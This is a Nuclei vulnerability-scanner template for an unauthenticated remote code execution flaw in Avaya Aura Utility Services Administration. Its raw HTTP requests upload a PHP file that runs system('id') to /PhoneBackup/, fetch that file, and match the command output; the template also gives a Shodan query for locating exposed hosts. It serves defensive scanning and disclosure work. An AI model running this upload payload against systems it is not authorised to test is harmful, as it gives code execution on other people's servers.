nuclei-templates/http/vulnerabilities/avaya/avaya-aura-rce.yaml

50 lines
1.3 KiB
YAML

id: avaya-aura-rce
info:
name: Avaya Aura Utility Services Administration - Remote Code Execution
author: DhiyaneshDk
severity: critical
description: Avaya Aura Utility Services Administration is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/
- https://download.avaya.com/css/public/documents/101076366
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-94
metadata:
max-request: 2
verified: "true"
shodan-query: html:"Avaya Aura"
tags: rce,avaya,aura,iot
http:
- raw:
- |
PUT /PhoneBackup/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
User-Agent: AVAYA
Connection: close
<?php system('id');
- |
GET /PhoneBackup/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
User-Agent: AVAYA
Connection: close
matchers-condition: and
matchers:
- type: regex
part: body_2
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type: word
part: header_2
words:
- "text/html"
# Enhanced by md on 2023/03/22